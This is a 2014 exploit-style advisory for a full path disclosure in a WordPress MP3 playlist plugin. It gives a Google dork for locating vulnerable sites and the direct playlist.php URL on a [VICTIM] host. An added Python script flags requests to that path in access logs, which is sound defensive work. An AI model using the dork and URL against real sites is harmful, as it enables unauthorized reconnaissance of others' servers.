WordPress HTML 5 MP3 Player with Playlist Plugin - Full Path Disclosure
2014-11-27 12:05:03 WordPress - (Html5 Mp3 Player with Playlist) Plugin <= Full Path Disclosure
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : [email protected]
[~] HomePage : http://h4x0resec.blogspot.com
[~] Greetz : Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor,
DaiMon, PRoMaX, ZoRLu, ( milw00rm.com )
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~App. : WordPress - (html5-mp3-player-with-playlist) Plugin
|~Software: https://wordpress.org/plugins/html5-mp3-player-with-playlist/
|~Software: https://github.com/wp-plugins/html5-mp3-player-with-playlist/tree/master/html5plus
|~Vulnerability Style : FULL PATH DISCLOSURE
|[~]Date : "26.11.2014"
|[~]Tested on : Kali Linux, Windows 7
|DORK: inurl:html5plus/html5full.php
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
==============[Exploitation]===============================
http://[VICTIM]/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php
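For defenders, an added example (not part of the original advisory) that flags direct requests to the path listed above in web server access logs. It assumes Combined Log Format; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Path listed under [Exploitation] on this page, relative to the WordPress root.
TARGET = "/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php"

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def normalize(target):
    """Drop the query string, percent-decode, collapse slashes, lowercase."""
    path = unquote(target.split("?", 1)[0])
    return re.sub(r"/+", "/", path).lower()

def direct_hits(lines):
    """Return (ip, time, status) for each direct request to the plugin script."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        # endswith() also covers WordPress installed in a subdirectory.
        if m and normalize(m.group("target")).endswith(TARGET):
            hits.append((m.group("ip"), m.group("time"), int(m.group("status"))))
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '198.51.100.7 - - [27/Nov/2014:12:05:03 +0000] "GET /wp-content/plugins/'
    'html5-mp3-player-with-playlist/html5plus/playlist.php HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.9 - - [27/Nov/2014:12:06:10 +0000] "GET /blog//wp-content/plugins/'
    'html5-mp3-player-with-playlist/html5plus/playlist%2Ephp?x=1 HTTP/1.1" 403 199 "-" "-"',
    # html5full.php appears only in the dork, not under [Exploitation]; not flagged.
    '192.0.2.44 - - [27/Nov/2014:12:07:00 +0000] "GET /wp-content/plugins/'
    'html5-mp3-player-with-playlist/html5plus/html5full.php HTTP/1.1" 200 4096 "-" "-"',
    '192.0.2.44 - - [27/Nov/2014:12:07:30 +0000] "GET /index.php HTTP/1.1" 200 9000 "-" "-"',
]

if __name__ == "__main__":
    for ip, when, status in direct_hits(SAMPLE):
        # A 200 means the server executed the script rather than blocking it.
        print(f"{when} {ip} requested playlist.php directly (HTTP {status})")
```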
Fixes
No fixes

